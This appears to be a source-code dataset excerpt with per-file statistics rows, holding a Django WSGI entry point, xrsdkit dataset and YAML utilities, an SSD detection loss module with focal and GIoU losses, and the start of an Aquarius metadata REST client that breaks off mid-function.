| 30.503165 | 79 | 0.665629 | 1,089 | 9,639 | 5.606061 | 0.20753 | 0.066503 | 0.046683 | 0.014742 | 0.238329 | 0.161835 | 0.116298 | 0.04095 | 0.02457 | 0.02457 | 0 | 0.0045 | 0.239236 | 9,639 | 315 | 80 | 30.6 | 0.828038 | 0.079158 | 0 | 0.177665 | 0 | 0 | 0.098711 | 0.032564 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071066 | false | 0 | 0.086294 | 0 | 0.208122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0b9f6e5c5c532895f403065515cdf1483093087d | 849 | py | Python | nubrain/wsgi.py | NuChwezi/nubrain | 0b7fc9ed269a008c406ac36f49aa5ec44fca619a | [
"MIT"
] | 1 | 2015-06-25T22:09:49.000Z | 2015-06-25T22:09:49.000Z | nubrain/wsgi.py | NuChwezi/nubrain | 0b7fc9ed269a008c406ac36f49aa5ec44fca619a | [
"MIT"
] | null | null | null | nubrain/wsgi.py | NuChwezi/nubrain | 0b7fc9ed269a008c406ac36f49aa5ec44fca619a | [
"MIT"
] | null | null | null | import os, sys
base = os.path.dirname(os.path.dirname(__file__))
base_parent = os.path.dirname(base)
# Remember original sys.path.
prev_sys_path = list(sys.path)
#new path...
sys.path.append(base)
sys.path.append(base_parent)
env_path = os.path.join(base, 'env/lib/python2.7/site-packages')
import site
site.addsitedir(env_path)
# Reorder sys.path so new directories at the front.
new_sys_path = []
for item in list(sys.path):
if item not in prev_sys_path:
new_sys_path.append(item)
sys.path.remove(item)
sys.path[:0] = new_sys_path
os.environ['DJANGO_SETTINGS_MODULE'] = 'nubrain.settings'
# Activate your virtual env
activate_env=os.path.join(base, 'env/bin/activate_this.py')
execfile(activate_env, dict(__file__=activate_env))
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
| 23.583333 | 64 | 0.755006 | 137 | 849 | 4.445255 | 0.386861 | 0.149425 | 0.064039 | 0.055829 | 0.055829 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004021 | 0.121319 | 849 | 35 | 65 | 24.257143 | 0.812332 | 0.134276 | 0 | 0 | 0 | 0 | 0.127397 | 0.105479 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.15 | 0 | 0.15 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0ba98472f49aced69213c027832d40a0432607c7 | 16,822 | py | Python | xrsdkit/tools/ymltools.py | scattering-central/pysaxs | fe46ae16f26cd40a1deea4dce222245960687a5d | [
"BSD-3-Clause-LBNL"
] | 5 | 2018-06-27T02:54:11.000Z | 2021-07-23T20:42:14.000Z | xrsdkit/tools/ymltools.py | scattering-central/pysaxs | fe46ae16f26cd40a1deea4dce222245960687a5d | [
"BSD-3-Clause-LBNL"
] | 78 | 2018-04-18T17:07:37.000Z | 2019-07-02T21:40:09.000Z | xrsdkit/tools/ymltools.py | scattering-central/pysaxs | fe46ae16f26cd40a1deea4dce222245960687a5d | [
"BSD-3-Clause-LBNL"
] | 1 | 2021-01-15T11:13:54.000Z | 2021-01-15T11:13:54.000Z | from __future__ import print_function
from collections import OrderedDict
import os
import sys
import copy
from distutils.dir_util import copy_tree
import shutil
from sklearn import preprocessing
import pandas as pd
import numpy as np
import yaml
from . import profiler, primitives
from ..system import System
from .. import definitions as xrsdefs
# `sgs.lattices` is referenced in sort_populations() below; the space-group
# module path used here is an assumption.
from ..scattering import space_groups as sgs
def save_sys_to_yaml(file_path,sys):
sd = sys.to_dict()
with open(file_path, 'w') as yaml_file:
yaml.dump(primitives(sd),yaml_file)
def load_sys_from_yaml(file_path):
with open(file_path, 'r') as yaml_file:
        sd = yaml.load(yaml_file, Loader=yaml.Loader)
return System(**sd)
def read_local_dataset(dataset_dirs, downsampling_distance=None, message_callback=print):
"""Load xrsdkit data from one or more local dataset directories.
Each dataset directory should contain
one subdirectory for each experiment in the dataset.
The subdirectory names should be the same as the experiment_id labels
for all samples in the subdirectory.
Each subdirectory should contain .yml files describing
the xrsdkit.system.System objects from the experiment.
Each .yml file should have a corresponding data file in the same directory,
where the data file contains the integrated scattering pattern.
The name of the data file should be specified in the .yml file,
referenced to sample_metadata['data_file'].
TODO: move this dataset description to the main documentation,
then refer to it from here.
Parameters
----------
dataset_dirs : list
list of absolute paths to the dataset root directories
Returns
-------
df : pandas.DataFrame
modeling DataFrame built from dataset files
    index_dict : dict
        dict mapping each dataset directory to an indexing DataFrame
        that associates .yml and .dat files with the corresponding
        experiment_id and sample_id.
"""
sys_dicts = OrderedDict()
ind_dict = {}
for dataset_dir in dataset_dirs:
idx_df = pd.DataFrame(columns=['sample_id','experiment_id','yml_file','data_file'])
for experiment in os.listdir(dataset_dir):
exp_data_dir = os.path.join(dataset_dir,experiment)
if os.path.isdir(exp_data_dir):
for s_data_file in os.listdir(exp_data_dir):
if s_data_file.endswith('.yml'):
if message_callback:
message_callback('loading data from {}'.format(s_data_file))
file_path = os.path.join(exp_data_dir, s_data_file)
sys = load_sys_from_yaml(file_path)
data_file = sys.sample_metadata['data_file']
idx_df = idx_df.append(dict(
sample_id=sys.sample_metadata['sample_id'],
experiment_id=sys.sample_metadata['experiment_id'],
yml_file=s_data_file,
data_file=sys.sample_metadata['data_file']
), ignore_index=True)
sys_dicts[s_data_file] = sys.to_dict()
ind_dict[dataset_dir] = idx_df
df = create_modeling_dataset(list(sys_dicts.values()),
downsampling_distance=downsampling_distance,
message_callback=message_callback)
return df, ind_dict
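# Usage sketch (the dataset path is a hypothetical placeholder):
#   df, index_dict = read_local_dataset(['/data/my_xrsd_dataset'],
#                                       downsampling_distance=1.)
# `df` holds one row of features and labels per good fit, and `index_dict`
# maps each dataset directory to a DataFrame pairing .yml and .dat files.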
def migrate_features(data_dir):
"""Update features for all yml files in a local directory.
Parameters
----------
data_dir : str
absolute path to the directory containing yml data
"""
print('BEGINNING FEATURE MIGRATION FOR DIRECTORY: {}'.format(data_dir))
for s_data_file in os.listdir(data_dir):
if s_data_file.endswith('.yml'):
print('loading data from {}'.format(s_data_file))
file_path = os.path.join(data_dir, s_data_file)
sys = load_sys_from_yaml(file_path)
q_I = np.loadtxt(os.path.join(data_dir,sys.sample_metadata['data_file']))
sys.features = profiler.profile_pattern(q_I[:,0],q_I[:,1])
save_sys_to_yaml(file_path,sys)
print('FINISHED FEATURE MIGRATION')
def create_modeling_dataset(xrsd_system_dicts, downsampling_distance=None, message_callback=print):
"""Build a modeling DataFrame from xrsdkit.system.System objects.
If `downsampling_distance` is not None, the dataset will be
downsampled with downsample_by_group(downsampling_distance).
Parameters
----------
xrsd_system_dicts: list of dict
Dicts describing all xrsdkit.system.System
objects in the dataset. Each of these dicts should be
similar to the output of xrsdkit.system.System.to_dict().
Returns
-------
df_work : pandas.DataFrame
dataframe containing features and labels
        extracted from the dataset.
"""
data = []
cls_labels = []
reg_labels = []
feat_labels = []
all_reg_labels = set()
all_cls_labels = set()
for sys in xrsd_system_dicts:
expt_id, sample_id, data_file, good_fit, feature_labels, \
classification_labels, regression_outputs = unpack_sample(sys)
if good_fit:
for k,v in regression_outputs.items():
all_reg_labels.add(k)
reg_labels.append(regression_outputs)
for k,v in classification_labels.items():
all_cls_labels.add(k)
cls_labels.append(classification_labels)
feat_labels.append(feature_labels)
data.append([expt_id,sample_id])
reg_labels_list = list(all_reg_labels)
reg_labels_list.sort()
cls_labels_list = list(all_cls_labels)
cls_labels_list.sort()
for datai,cli,rli,featsi in zip(data,cls_labels,reg_labels,feat_labels):
ocl = OrderedDict.fromkeys(cls_labels_list)
ocl.update(cli)
orl = OrderedDict.fromkeys(reg_labels_list)
orl.update(rli)
ofl = OrderedDict.fromkeys(profiler.profile_keys)
ofl.update(featsi)
datai.extend(list(ocl.values()))
datai.extend(list(orl.values()))
datai.extend(list(ofl.values()))
colnames = ['experiment_id','sample_id'] + \
cls_labels_list + \
reg_labels_list + \
copy.copy(profiler.profile_keys)
df_work = pd.DataFrame(data=data, columns=colnames)
if downsampling_distance:
df_work = downsample_by_group(df_work,downsampling_distance,message_callback)
return df_work
def unpack_sample(sys_dict):
"""Extract features and labels from the dict describing the sample.
Parameters
----------
sys_dict : dict
dict containing description of xrsdkit.system.System.
Includes fit_report, sample_metadata, features,
noise_model, and one dict for each of the populations.
Returns
-------
expt_id : str
id of the experiment (should be unique across all experiments)
sample_id : str
id of the sample (must be unique across all samples)
    data_file : str
name of .dat file that contains q/I array
good_fit : bool
True if this sample's fit is good enough to train models on it
features : dict
dict of features with their values,
similar to output of xrsdkit.tools.profiler.profile_pattern()
classification_labels : dict
dict of all classification labels with their values for given sample
regression_labels : dict
dict of all regression labels with their values for given sample
"""
expt_id = sys_dict['sample_metadata']['experiment_id']
sample_id = sys_dict['sample_metadata']['sample_id']
data_file = sys_dict['sample_metadata']['data_file']
features = sys_dict['features']
good_fit = bool(sys_dict['fit_report']['good_fit'])
sys = System(**sys_dict)
regression_labels = {}
classification_labels = {}
sys_cls = ''
ipop = 0
I0 = sys.noise_model.parameters['I0']['value']
for k, v in sys.populations.items():
I0 += v.parameters['I0']['value']
I0_noise = sys.noise_model.parameters['I0']['value']
if I0 == 0.:
regression_labels['noise_I0_fraction'] = 0.
else:
regression_labels['noise_I0_fraction'] = I0_noise/I0
classification_labels['noise_model'] = sys.noise_model.model
for param_nm,pd in sys.noise_model.parameters.items():
regression_labels['noise_'+param_nm] = pd['value']
# use xrsdefs.structure_names to index the populations
for struct_nm in xrsdefs.structure_names:
struct_pops = OrderedDict()
for pop_nm,pop in sys.populations.items():
if pop.structure == struct_nm:
struct_pops[pop_nm] = pop
# sort any populations with same structure
struct_pops = sort_populations(struct_nm,struct_pops)
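        # the deterministic ordering makes the pop{i}_* labels below
        # reproducible across refits of the same system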
for pop_nm, pop in struct_pops.items():
if I0 == 0.:
regression_labels['pop{}_I0_fraction'.format(ipop)] = 0.
else:
pop_I0 = pop.parameters['I0']['value']
regression_labels['pop{}_I0_fraction'.format(ipop)] = pop_I0/I0
#classification_labels['pop{}_structure'.format(ipop)] = pop.structure
classification_labels['pop{}_form'.format(ipop)] = pop.form
for param_nm, param_def in pop.parameters.items():
regression_labels['pop{}_{}'.format(ipop,param_nm)] = param_def['value']
for stg_nm, stg_val in pop.settings.items():
if stg_nm in xrsdefs.modelable_structure_settings[pop.structure] \
or stg_nm in xrsdefs.modelable_form_factor_settings[pop.form]:
classification_labels['pop{}_{}'.format(ipop,stg_nm)] = str(stg_val)
if sys_cls: sys_cls += '__'
sys_cls += pop.structure
ipop += 1
if sys_cls == '':
sys_cls = 'unidentified'
classification_labels['system_class'] = sys_cls
return expt_id, sample_id, data_file, good_fit, features, classification_labels, regression_labels
def sort_populations(struct_nm,pops_dict):
"""Sort a set of populations (all with the same structure)"""
if len(pops_dict) < 2:
return pops_dict
new_pops = OrderedDict()
# get a list of the population labels
pop_labels = list(pops_dict.keys())
# collect params for each population
param_vals = dict.fromkeys(pop_labels)
for l in pop_labels: param_vals[l] = []
param_labels = []
dtypes = {}
if struct_nm == 'crystalline':
# order crystalline structures primarily by lattice,
# secondly by form factor
for l in pop_labels:
param_vals[l].append(sgs.lattices.index(pops_dict[l].settings['lattice']))
param_labels.append('lattice')
dtypes['lattice']='int'
for l in pop_labels:
param_vals[l].append(xrsdefs.form_factor_names.index(pops_dict[l].form))
param_labels.append('form')
dtypes['form']='int'
# NOTE: the following only works if the previous two categories were all-same
#for param_nm in xrsdefs.structure_params(struct_nm,pops_dict[l].settings):
# for l in pop_labels: param_vals[l].append(pops_dict[l].parameters[param_nm]['value'])
# param_labels.append(param_nm)
# dtypes[param_nm]='float'
if struct_nm == 'disordered':
# order disordered structures primarily by interaction,
# secondly by form factor
intxns = xrsdefs.setting_selections('interaction')
for l in pop_labels:
param_vals[l].append(intxns.index(pops_dict[l].settings['interaction']))
param_labels.append('interaction')
dtypes['interaction']='int'
for l in pop_labels:
param_vals[l].append(xrsdefs.form_factor_names.index(pops_dict[l].form))
param_labels.append('form')
dtypes['form']='int'
# NOTE: the following only works if the previous two categories were all-same
#for param_nm in xrsdefs.structure_params(struct_nm,pops_dict[l].settings):
# for l in pop_labels: param_vals[l].append(pops_dict[l].parameters[param_nm]['value'])
# param_labels.append(param_nm)
# dtypes[param_nm]='float'
# for diffuse structures, order primarily by form,
# secondly by form factor params
if struct_nm == 'diffuse':
for l in pop_labels:
param_vals[l].append(xrsdefs.form_factor_names.index(pops_dict[l].form))
param_labels.append('form')
dtypes['form']='int'
ff = pops_dict[pop_labels[0]].form
if all([pops_dict[ll].form == ff for ll in pop_labels]):
for param_nm in xrsdefs.form_factor_params(ff):
for l in pop_labels: param_vals[l].append(pops_dict[l].parameters[param_nm]['value'])
param_labels.append(param_nm)
dtypes[param_nm]='float'
param_ar = np.array(
[tuple([l]+param_vals[l]) for l in pop_labels],
dtype = [('pop_name','U32')]+[(pl,dtypes[pl]) for pl in param_labels]
)
param_ar.sort(axis=0,order=param_labels)
    for p in param_ar: new_pops[p[0]] = pops_dict[p[0]]
return new_pops
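# --- Hedged worked example (added): how the structured-array sort above
# behaves on toy data; the population labels and integer sort keys are
# invented for illustration.
#   ar = np.array([('b', 1), ('a', 0)],
#                 dtype=[('pop_name', 'U32'), ('form', 'int')])
#   ar.sort(axis=0, order=['form'])
#   [p[0] for p in ar]  # -> ['a', 'b']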
def downsample_by_group(df,min_distance=1.,message_callback=print):
"""Group and down-sample a DataFrame of xrsd records.
Parameters
----------
df : pandas.DataFrame
dataframe containing xrsd samples
min_distance : float
the minimum allowed nearest-neighbor distance
for continuing to downsample after 10 or more samples
have been selected
Returns
-------
data_sample : pandas.DataFrame
DataFrame containing all of the down-sampled data from
each group in the input dataframe.
Features in this DataFrame are not scaled:
the correct scaler should be applied before training models.
"""
data_sample = pd.DataFrame(columns=df.columns)
group_cols = ['experiment_id','system_class']
all_groups = df.groupby(group_cols)
# downsample each group independently
for group_labels,grp in all_groups.groups.items():
group_df = df.iloc[grp].copy()
if message_callback:
message_callback('Downsampling data for group: {}'.format(group_labels))
        #lbl_df = _filter_by_labels(data,lbls)
        dsamp = downsample(group_df, min_distance)
if message_callback:
message_callback('Finished downsampling: kept {}/{}'.format(len(dsamp),len(group_df)))
data_sample = data_sample.append(dsamp)
return data_sample
def downsample(df, min_distance):
"""Downsample records from one DataFrame.
Transforms the DataFrame feature arrays
(scaling by the columns in profiler.profile_keys),
before collecting at least 10 samples.
If the size of `df` is <= 10, it is returned directly.
If it is larger than 10, the first point is chosen
based on greatest nearest-neighbor distance.
Subsequent points are chosen
in order of decreasing nearest-neighbor distance
to the already-sampled points.
Parameters
----------
df : pandas.DataFrame
dataframe containing xrsd samples
min_distance : float
the minimum allowed nearest-neighbor distance
for continuing to downsample after 10 or more samples
have been selected
Returns
-------
sample : pandas.DataFrame
dataframe containing downsampled rows
"""
df_size = len(df)
sample = pd.DataFrame(columns=df.columns)
if df_size <= 10:
sample = sample.append(df)
else:
scaler = preprocessing.StandardScaler()
scaler.fit(df[profiler.profile_keys])
# get distance matrix between samples in scaled feature space
features_matr = scaler.transform(df[profiler.profile_keys])
        dist_func = lambda i, j: np.linalg.norm(
            features_matr[i] - features_matr[j])
# TODO: compute only the upper or lower triangle of this matrix
dist_matrix = np.array([[dist_func(i,j) for i in range(df_size)] for j in range(df_size)])
# artificially inflate self-distance,
# so that samples are not their own nearest neighbors
for i in range(df_size):
dist_matrix[i,i] = float('inf')
# samples are taken in order of greatest nearest-neighbor distance
nn_distance_array = np.min(dist_matrix,axis=1)
sample_order = np.argsort(nn_distance_array)[::-1]
keep_samples = np.array([idx<10 or nn_distance_array[sample_idx]>min_distance for idx,sample_idx in enumerate(sample_order)])
sample_order = sample_order[keep_samples]
sample = sample.append(df.iloc[sample_order])
return sample
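# --- Hedged sketch (added): a vectorized alternative to the nested Python
# loop in `downsample`, addressing the TODO about computing only one triangle
# of the distance matrix. The scipy import is an assumption not made
# elsewhere in this module.
def pairwise_distance_matrix(features_matr):
    """Return the full euclidean distance matrix with inf on the diagonal."""
    from scipy.spatial.distance import pdist, squareform
    # pdist computes only the condensed upper triangle; squareform expands it
    dist_matrix = squareform(pdist(features_matr, metric='euclidean'))
    # inflate self-distance so samples are not their own nearest neighbors
    np.fill_diagonal(dist_matrix, float('inf'))
    return dist_matrix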
| 40.340528 | 133 | 0.655867 | 2,204 | 16,822 | 4.788566 | 0.162886 | 0.01895 | 0.011465 | 0.008528 | 0.270324 | 0.215748 | 0.19007 | 0.159181 | 0.145821 | 0.134262 | 0 | 0.003965 | 0.250386 | 16,822 | 416 | 134 | 40.4375 | 0.83299 | 0.322197 | 0 | 0.122271 | 0 | 0 | 0.069032 | 0 | 0 | 0 | 0 | 0.004808 | 0 | 1 | 0.039301 | false | 0 | 0.061135 | 0 | 0.135371 | 0.030568 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0baa358b8a90d3a13df8f439de6acfd48646e1c7 | 9,968 | py | Python | SSD/SSD_FPN_GIoU/utils/loss/multibox_loss.py | ForrestPi/ObjectDetection | 54e0821e73f67be5360c36f01229a123c34ab3b3 | [
"MIT"
] | 12 | 2020-03-25T01:24:22.000Z | 2021-09-18T06:40:16.000Z | SSD/SSD_FPN_GIoU/utils/loss/multibox_loss.py | ForrestPi/ObjectDetection | 54e0821e73f67be5360c36f01229a123c34ab3b3 | [
"MIT"
] | 1 | 2020-04-22T07:52:36.000Z | 2020-04-22T07:52:36.000Z | SSD/SSD_FPN_GIoU/utils/loss/multibox_loss.py | ForrestPi/ObjectDetection | 54e0821e73f67be5360c36f01229a123c34ab3b3 | [
"MIT"
] | 4 | 2020-03-25T01:24:26.000Z | 2020-09-20T11:29:09.000Z | # -*- coding: utf-8 -*-
import torch
import torch.nn as nn
import torch.nn.functional as F
from ..box import match, log_sum_exp
from ..box import match_gious,bbox_overlaps_giou,decode
class FocalLoss(nn.Module):
"""
    This criterion is an implementation of Focal Loss, which is proposed in
Focal Loss for Dense Object Detection.
Loss(x, class) = - \alpha (1-softmax(x)[class])^gamma \log(softmax(x)[class])
The losses are averaged across observations for each minibatch.
Args:
alpha(1D Tensor, Variable) : the scalar factor for this criterion
gamma(float, double) : gamma > 0; reduces the relative loss for well-classified examples (p > .5),
putting more focus on hard, misclassified examples
size_average(bool): By default, the losses are averaged over observations for each minibatch.
However, if the field size_average is set to False, the losses are
instead summed for each minibatch.
"""
def __init__(self, class_num, alpha=None, gamma=2, size_average=True):
super(FocalLoss, self).__init__()
if alpha is None:
self.alpha = torch.ones(class_num, 1)
else:
self.alpha = alpha
self.gamma = gamma
self.class_num = class_num
self.size_average = size_average
print(self.gamma,self.alpha)
def forward(self, inputs, targets):
N = inputs.size(0)
C = inputs.size(1)
        P = F.softmax(inputs, dim=1)
class_mask = inputs.data.new(N, C).fill_(0)
#class_mask = Variable(class_mask)
ids = targets.view(-1, 1)
class_mask.scatter_(1, ids.data, 1.)
if inputs.is_cuda and not self.alpha.is_cuda:
self.alpha = self.alpha.cuda()
alpha = self.alpha[ids.data.view(-1)]
probs = (P*class_mask).sum(1).view(-1,1)
log_p = probs.log()
batch_loss = -alpha*(torch.pow((1-probs), self.gamma))*log_p
if self.size_average:
loss = batch_loss.mean()
else:
loss = batch_loss.sum()
return loss
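# --- Hedged usage sketch (added): a minimal smoke test for FocalLoss; the
# batch size, class count, and random values below are illustrative only.
def _focal_loss_example():
    criterion = FocalLoss(class_num=3, gamma=2, size_average=True)
    inputs = torch.randn(4, 3)           # raw logits, shape (N, C)
    targets = torch.randint(0, 3, (4,))  # integer class labels, shape (N,)
    return criterion(inputs, targets)    # scalar mean focal loss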
class GiouLoss(nn.Module):
"""
    This criterion is an implementation of GIoU Loss, which is proposed in
    Generalized Intersection over Union: A Metric and A Loss for Bounding Box Regression.
Loss(loc_p, loc_t) = 1-GIoU
The losses are summed across observations for each minibatch.
Args:
size_sum(bool): By default, the losses are summed over observations for each minibatch.
However, if the field size_sum is set to False, the losses are
instead averaged for each minibatch.
predmodel(Corner,Center): By default, the loc_p is the Corner shape like (x1,y1,x2,y2)
The shape is [num_prior,4],and it's (x_1,y_1,x_2,y_2)
loc_p: the predict of loc
loc_t: the truth of boxes, it's (x_1,y_1,x_2,y_2)
"""
def __init__(self,pred_mode = 'Center',size_sum=True,variances=None):
super(GiouLoss, self).__init__()
self.size_sum = size_sum
self.pred_mode = pred_mode
self.variances = variances
def forward(self, loc_p, loc_t,prior_data):
num = loc_p.shape[0]
if self.pred_mode == 'Center':
decoded_boxes = decode(loc_p, prior_data, self.variances)
else:
decoded_boxes = loc_p
        # per-box GIoU loss: 1 - GIoU
        gious = 1.0 - bbox_overlaps_giou(decoded_boxes, loc_t)
        loss = torch.sum(gious)
        if not self.size_sum:
            loss = loss / num
        # constant weighting factor applied to the regression loss
        return 5 * loss
class MultiBoxLoss(nn.Module):
"""SSD Weighted Loss Function
Compute Targets:
1) Produce Confidence Target Indices by matching ground truth boxes
with (default) 'priorboxes' that have jaccard index > threshold parameter
(default threshold: 0.5).
2) Produce localization target by 'encoding' variance into offsets of ground
truth boxes and their matched 'priorboxes'.
3) Hard negative mining to filter the excessive number of negative examples
that comes with using a large number of default bounding boxes.
(default negative:positive ratio 3:1)
Objective Loss:
L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
Where, Lconf is the CrossEntropy Loss and Lloc is the SmoothL1 Loss
weighted by α which is set to 1 by cross val.
Args:
c: class confidences,
l: predicted boxes,
g: ground truth boxes
N: number of matched default boxes
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
"""
def __init__(self, cfg, overlap_thresh, prior_for_matching,
bkg_label, neg_mining, neg_pos, neg_overlap, encode_target,
use_gpu=True,loss_c = "CrossEntropy", loss_r = 'SmoothL1'):
super(MultiBoxLoss, self).__init__()
self.use_gpu = use_gpu
self.num_classes = cfg['num_classes']
self.threshold = overlap_thresh
self.background_label = bkg_label
self.encode_target = encode_target
self.use_prior_for_matching = prior_for_matching
self.do_neg_mining = neg_mining
self.negpos_ratio = neg_pos
self.neg_overlap = neg_overlap
self.variance = cfg['variance']
self.focalloss = FocalLoss(self.num_classes,gamma=2,size_average = False)
self.gious = GiouLoss(pred_mode = 'Center',size_sum=True,variances=self.variance)
self.loss_c = loss_c
self.loss_r = loss_r
        # validate the configured loss names
        if self.loss_r not in ('SmoothL1', 'Giou'):
            raise ValueError("The loss_r is invalid, loss name must be SmoothL1 or Giou")
        if self.loss_c not in ('CrossEntropy', 'FocalLoss'):
            raise ValueError("The loss_c is invalid, loss name must be CrossEntropy or FocalLoss")
def forward(self, predictions, targets):
"""Multibox Loss
Args:
predictions (tuple): A tuple containing loc preds, conf preds,
and prior boxes from SSD net.
conf shape: torch.size(batch_size,num_priors,num_classes)
loc shape: torch.size(batch_size,num_priors,4)
priors shape: torch.size(num_priors,4)
targets (tensor): Ground truth boxes and labels for a batch,
shape: [batch_size,num_objs,5] (last idx is the label).
"""
loc_data, conf_data, priors = predictions
num = loc_data.size(0)
priors = priors[:loc_data.size(1), :]
num_priors = (priors.size(0))
# match priors (default boxes) and ground truth boxes
loc_t = torch.Tensor(num, num_priors, 4)
conf_t = torch.LongTensor(num, num_priors)
for idx in range(num):
truths = targets[idx][:, :-1].data
labels = targets[idx][:, -1].data
defaults = priors.data
if self.loss_r == 'SmoothL1':
match(self.threshold, truths, defaults, self.variance, labels,
loc_t, conf_t, idx)
elif self.loss_r == 'Giou':
match_gious(self.threshold, truths, defaults, self.variance, labels,
loc_t, conf_t, idx)
if self.use_gpu:
loc_t = loc_t.cuda()
conf_t = conf_t.cuda()
# wrap targets
#loc_t = Variable(loc_t, requires_grad=True)
#conf_t = Variable(conf_t, requires_grad=True)
pos = conf_t > 0
num_pos = pos.sum(dim=1, keepdim=True)
# Localization Loss (Smooth L1)
# Shape: [batch,num_priors,4]
pos_idx = pos.unsqueeze(pos.dim()).expand_as(loc_data)
loc_p = loc_data[pos_idx].view(-1, 4)
loc_t = loc_t[pos_idx].view(-1, 4)
if self.loss_r == 'SmoothL1':
loss_l = F.smooth_l1_loss(loc_p, loc_t, reduction='sum')
elif self.loss_r == 'Giou':
giou_priors = priors.data.unsqueeze(0).expand_as(loc_data)
loss_l = self.gious(loc_p,loc_t,giou_priors[pos_idx].view(-1, 4))
# Compute max conf across batch for hard negative mining
if self.loss_c == "CrossEntropy":
batch_conf = conf_data.view(-1, self.num_classes)
loss_c = log_sum_exp(batch_conf) - batch_conf.gather(1, conf_t.view(-1, 1))
# Hard Negative Mining
loss_c = loss_c.view(num, -1)
loss_c[pos] = 0
_, loss_idx = loss_c.sort(1, descending=True)
_, idx_rank = loss_idx.sort(1)
num_pos = pos.long().sum(1, keepdim=True)
num_neg = torch.clamp(self.negpos_ratio*num_pos, max=pos.size(1)-1)
neg = idx_rank < num_neg.expand_as(idx_rank)
# Confidence Loss Including Positive and Negative Examples
pos_idx = pos.unsqueeze(2).expand_as(conf_data)
neg_idx = neg.unsqueeze(2).expand_as(conf_data)
            # logical OR: adding bool masks is unsupported in newer PyTorch
            conf_p = conf_data[(pos_idx | neg_idx)].view(-1, self.num_classes)
            targets_weighted = conf_t[(pos | neg)]
loss_c = F.cross_entropy(conf_p, targets_weighted, reduction='sum')
# Sum of losses: L(x,c,l,g) = (Lconf(x, c) + αLloc(x,l,g)) / N
elif self.loss_c == "FocalLoss":
batch_conf = conf_data.view(-1, self.num_classes)
loss_c = self.focalloss(batch_conf,conf_t)
N = num_pos.data.sum().double()
loss_l = loss_l.double()
loss_c = loss_c.double()
loss_l /= N
loss_c /= N
return loss_l, loss_c
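# --- Hedged usage sketch (added): wiring MultiBoxLoss into a training step.
# The cfg keys, prior count (8732, as in SSD300), and tensor shapes are
# assumptions chosen to match the shape conventions documented in `forward`;
# it also assumes the `match` helper behaves like the canonical SSD one.
def _multibox_loss_example():
    cfg = {'num_classes': 21, 'variance': [0.1, 0.2]}
    criterion = MultiBoxLoss(cfg, overlap_thresh=0.5, prior_for_matching=True,
                             bkg_label=0, neg_mining=True, neg_pos=3,
                             neg_overlap=0.5, encode_target=False,
                             use_gpu=False, loss_c='CrossEntropy',
                             loss_r='SmoothL1')
    loc = torch.randn(2, 8732, 4)    # localization predictions
    conf = torch.randn(2, 8732, 21)  # class confidences
    priors = torch.rand(8732, 4)     # default boxes
    # per-image ground truth: [num_objs, 5], last column is the class label
    targets = [torch.tensor([[0.1, 0.1, 0.5, 0.5, 3.]]) for _ in range(2)]
    return criterion((loc, conf, priors), targets)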
| 41.190083 | 110 | 0.599318 | 1,375 | 9,968 | 4.155636 | 0.193455 | 0.016626 | 0.012601 | 0.019601 | 0.20371 | 0.169583 | 0.131082 | 0.10798 | 0.083479 | 0.083479 | 0 | 0.014666 | 0.302267 | 9,968 | 241 | 111 | 41.360996 | 0.806614 | 0.337681 | 0 | 0.120301 | 0 | 0 | 0.042512 | 0 | 0 | 0 | 0 | 0 | 0.015038 | 1 | 0.045113 | false | 0 | 0.037594 | 0 | 0.12782 | 0.007519 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
0bac96be21f324633762090b8c1c981aac177216 | 4,309 | py | Python | backend/squid_py/aquariuswrapper.py | OutlierVentures/H2O | 73137b3a00b3f6767aea7e67227d08a1508194ae | [
"Apache-2.0"
] | 9 | 2018-12-26T17:07:58.000Z | 2019-06-03T06:46:24.000Z | backend/squid_py/aquariuswrapper.py | OutlierVentures/H2O | 73137b3a00b3f6767aea7e67227d08a1508194ae | [
"Apache-2.0"
] | 2 | 2018-12-19T21:06:51.000Z | 2021-05-09T18:43:19.000Z | backend/squid_py/aquariuswrapper.py | OutlierVentures/H2O | 73137b3a00b3f6767aea7e67227d08a1508194ae | [
"Apache-2.0"
] | 1 | 2019-05-15T17:19:59.000Z | 2019-05-15T17:19:59.000Z | import json
import logging
import requests
class AquariusWrapper(object):
def __init__(self, aquarius_url):
"""
The Metadata class is a wrapper on the Metadata Store, which has exposed a REST API
:param aquarius_url:
"""
if '/api/v1/aquarius/assets' in aquarius_url:
aquarius_url = aquarius_url[:aquarius_url.find('/api/v1/aquarius/assets')]
self._base_url = '{}/api/v1/aquarius/assets'.format(aquarius_url)
self._headers = {'content-type': 'application/json'}
logging.debug("Metadata Store connected at {}".format(aquarius_url))
logging.debug("Metadata Store API documentation at {}/api/v1/docs".format(aquarius_url))
logging.debug("Metadata assets at {}".format(self._base_url))
def get_service_endpoint(self, did):
return self._base_url + '/ddo/%s' % did
def list_assets(self):
asset_list = json.loads(requests.get(self._base_url).content)
if asset_list and 'ids' in asset_list:
return asset_list['ids']
return []
def get_asset_metadata(self, asset_did):
response = requests.get(self._base_url + '/ddo/%s' % asset_did).content
if not response:
